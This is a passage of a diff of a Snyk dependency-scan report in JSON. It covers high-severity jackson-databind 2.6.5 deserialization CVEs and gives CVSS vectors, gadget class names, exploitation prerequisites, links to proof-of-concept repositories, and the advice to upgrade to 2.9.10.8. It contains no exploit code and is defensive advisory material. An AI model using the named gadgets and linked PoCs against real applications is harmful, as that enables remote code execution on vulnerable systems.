"severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.319616Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:59.448286Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.759947Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [Al1ex's Poc](https://github.com/Al1ex/CVE-2020-36179)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.72318", - "probability": "0.00357", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36179" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:29:22.463416Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:12:59Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:34Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:23.759947Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056421", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3004", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-36179", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:38.913838Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.693276Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.436792Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:38.913838Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.693276Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36179)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36182" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:30:54.237288Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:30:00Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:35Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:24.693276Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056424", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2998", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:39.244182Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:01.307628Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - 
"cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.622591Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:39.244182Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:01.307628Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2998)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36185" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:36:40.536722Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:34:52Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:33.303463Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:01.307628Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - 
"com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056425", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[, 2.9.10.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2996", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:00.658291Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.824076Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": 
"2024-03-06T13:59:42.513059Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:00.658291Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.824076Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. 
The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2996)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36189" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:37:54.679882Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:37:04Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:33.089230Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:23.824076Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - 
"com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056426", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2996", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-36188", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:38.922274Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:03.468032Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": 
"high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:42.488317Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:38.922274Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:03.468032Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
